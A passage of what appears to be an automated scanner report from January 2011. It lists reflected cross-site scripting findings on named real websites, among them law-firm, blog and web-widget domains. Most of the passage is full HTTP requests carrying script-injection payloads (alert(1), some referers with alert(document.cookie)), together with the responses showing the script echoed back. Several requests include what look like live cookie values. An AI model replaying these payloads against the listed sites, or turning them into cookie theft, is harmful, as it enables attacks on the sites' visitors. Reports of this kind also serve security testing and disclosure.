HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 220 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:44 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:44 GMT; Path=/ Set-Cookie: di=%7B%7D..1295460044.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 10:54:33 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 18:00:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 18:00:44 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b5131<script>alert(1)</script>ac69988ca2e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.wileyrein.com/p.json?callback=_ate.ad.hprb5131<script>alert(1)</script>ac69988ca2e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.wileyrein.com%2Fjsfe969%252522%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253ec77ca9823dd%2Fui.dialog.js&ref=http%3A%2F%2Fburp%2Fshow%2F5&2lh2lm HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:41 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:41 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 18:00:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 18:00:41 GMT Connection: close
4.28. http://financaspessoais.blog.br/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://financaspessoais.blog.br
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8184"><script>alert(1)</script>c42c81b1212 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8184\"><script>alert(1)</script>c42c81b1212 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f8184"><script>alert(1)</script>c42c81b1212=1 HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:16 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?f8184\"><script>alert(1)</script>c42c81b1212=1#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff57"><script>alert(1)</script>29569e332da was submitted in the utm_campaign parameter. This input was echoed as aff57\"><script>alert(1)</script>29569e332da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57"><script>alert(1)</script>29569e332da HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:50 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57\"><script>alert(1)</script>29569e332da#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259b8"><script>alert(1)</script>8849500d1f1 was submitted in the utm_content parameter. This input was echoed as 259b8\"><script>alert(1)</script>8849500d1f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:30 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8\"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1033"><script>alert(1)</script>f894aad5354 was submitted in the utm_medium parameter. This input was echoed as e1033\"><script>alert(1)</script>f894aad5354 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badgee1033"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:02 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=blogger&utm_medium=badgee1033\"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab23b"><script>alert(1)</script>dbf1985e564 was submitted in the utm_source parameter. This input was echoed as ab23b\"><script>alert(1)</script>dbf1985e564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=bloggerab23b"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:48 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=bloggerab23b\"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45a3"><script>alert(1)</script>2751ef5eaae was submitted in the utm_term parameter. This input was echoed as a45a3\"><script>alert(1)</script>2751ef5eaae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:15 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3\"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372 was submitted in the REST URL parameter 1. This input was echoed as 3018b"><img src=a onerror=alert(1)>23dd898c372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tools3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372/ HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 /tools3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372/ Server: nginx/0.7.65 Date: Wed, 19 Jan 2011 15:23:41 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 5920
Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <body id="tools3018b"><img src=a onerror=alert(1)>23dd898c372" class="msie tools"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5 was submitted in the REST URL parameter 1. This input was echoed as f3bd2"><img src=a onerror=alert(1)>edbe5526fa5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /toolsf3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5/expose.html HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 /toolsf3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5/expose.html Server: nginx/0.7.65 Date: Wed, 19 Jan 2011 15:23:42 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 5835
Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <body id="toolsf3bd2"><img src=a onerror=alert(1)>edbe5526fa5_expose" class="msie tools"> ...[SNIP]...
4.36. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jonesdaydiversity.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc5a'-alert(1)-'5b7885e79b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fbc5a'-alert(1)-'5b7885e79b2=1 HTTP/1.1 Host: jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload a088d<script>alert(1)</script>e11cd877bb9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=K08784a088d<script>alert(1)</script>e11cd877bb9&auto=t HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 19 Jan 2011 18:01:06 GMT Cache-Control: max-age=86400, private Expires: Thu, 20 Jan 2011 18:01:06 GMT Content-Type: application/javascript;charset=ISO-8859-1 Date: Wed, 19 Jan 2011 18:01:05 GMT Content-Length: 128
/* * JavaScript include error: * The customer code "K08784A088D<SCRIPT>ALERT(1)</SCRIPT>E11CD877BB9" was not recognized. */
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed76e'-alert(1)-'ef86bc64d25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event-log-analysis-smed76e'-alert(1)-'ef86bc64d25/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Date: Wed, 19 Jan 2011 18:09:18 GMT Server: TornadoServer/1.0 Content-Length: 2205 Connection: Close
4.39. http://rafael.adm.br/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://rafael.adm.br
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb7d"><script>alert(1)</script>21b58676d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffb7d\\\"><script>alert(1)</script>21b58676d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ffb7d"><script>alert(1)</script>21b58676d82=1 HTTP/1.1 Host: rafael.adm.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 19 Jan 2011 16:58:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.10-2ubuntu6 Vary: Cookie X-Pingback: http://rafael.adm.br/xmlrpc.php Content-Length: 43014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="http://rafael.adm.br/page/2/?ffb7d\\\"><script>alert(1)</script>21b58676d82=1"> ...[SNIP]...
4.40. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skaddenpractices.skadden.com
Path:
/fca/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2fa"><script>alert(1)</script>7a7277b34d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fca/?6f2fa"><script>alert(1)</script>7a7277b34d3=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.41. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skaddenpractices.skadden.com
Path:
/hc/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d57"><script>alert(1)</script>5968cea9b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hc/?b6d57"><script>alert(1)</script>5968cea9b03=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.42. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skaddenpractices.skadden.com
Path:
/sec/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81116"><script>alert(1)</script>ab7d185670b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sec/?81116"><script>alert(1)</script>ab7d185670b=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.43. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skaddenpractices.skadden.com
Path:
/sec/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>cc7c0c0318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sec/?7ae3b"><script>alert(1)</script>cc7c0c0318c=1 HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the username request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe165'%3balert(1)//8402f0b736c was submitted in the username parameter. This input was echoed as fe165';alert(1)//8402f0b736c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/?username=rafaelpfe165'%3balert(1)//8402f0b736c HTTP/1.1 Host: twittercounter.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:03:39 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Expires: Sat, 29 Jan 2011 18:03:39 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 448
<!-- document.write( '<div id="TwitterCounter"><a href="http://twittercounter.com/rafaelpfe165';alert(1)//8402f0b736c" title="TwitterCounter for @rafaelpfe165';alert(1)//8402f0b736c" target="_blank"> ...[SNIP]...
The value of the dn request parameter is copied into a JavaScript inline comment. The payload e35b9*/alert(1)//6ec7245ba5b was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView?dn=e35b9*/alert(1)//6ec7245ba5b HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37b7"%3balert(1)//97f91a6f73c was submitted in the dn parameter. This input was echoed as f37b7";alert(1)//97f91a6f73c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView?dn=f37b7"%3balert(1)//97f91a6f73c HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into the HTML document as text between TITLE tags. The payload 6c6ee</title><script>alert(1)</script>4caa1df9615 was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=6c6ee</title><script>alert(1)</script>4caa1df9615 HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58025'%3balert(1)//1b423bdb38b was submitted in the dn parameter. This input was echoed as 58025';alert(1)//1b423bdb38b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
